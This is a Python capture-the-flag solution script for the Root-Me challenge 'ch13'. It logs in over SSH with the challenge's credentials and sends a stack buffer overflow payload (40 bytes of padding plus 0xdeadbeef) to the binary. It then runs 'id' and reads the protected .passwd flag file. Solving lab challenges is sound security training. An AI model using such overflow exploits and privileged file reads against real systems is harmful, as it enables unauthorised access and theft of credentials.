#!/usr/bin/env python3
import time

import paramiko

HOST = "challenge02.root-me.org"
PORT = 2222
USER = "app-systeme-ch13"
PASSWORD = "app-systeme-ch13"


def drain(channel: paramiko.Channel, loops: int = 20, delay: float = 0.2) -> str:
    chunks = []
    for _ in range(loops):
        time.sleep(delay)
        while channel.recv_ready():
            chunks.append(channel.recv(65535).decode("utf-8", errors="replace"))
    return "".join(chunks)


def run() -> None:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(
        hostname=HOST, port=PORT, username=USER, password=PASSWORD, timeout=15
    )
    try:
        shell = client.invoke_shell()
        banner = drain(shell, loops=10)
        if banner:
            print(banner, end="")

        exploit = (
            '(python3 -c "import sys; '
            "sys.stdout.buffer.write(b'A'*40+b'\\xef\\xbe\\xad\\xde')\"; "
            "cat) | ./ch13\n"
        )
        shell.send(exploit.encode())
        print(drain(shell, loops=12), end="")

        shell.send(b"id\n")
        shell.send(b"cat .passwd\n")
        shell.send(b"exit\n")
        print(drain(shell, loops=20), end="")
    finally:
        client.close()


if __name__ == "__main__":
    run()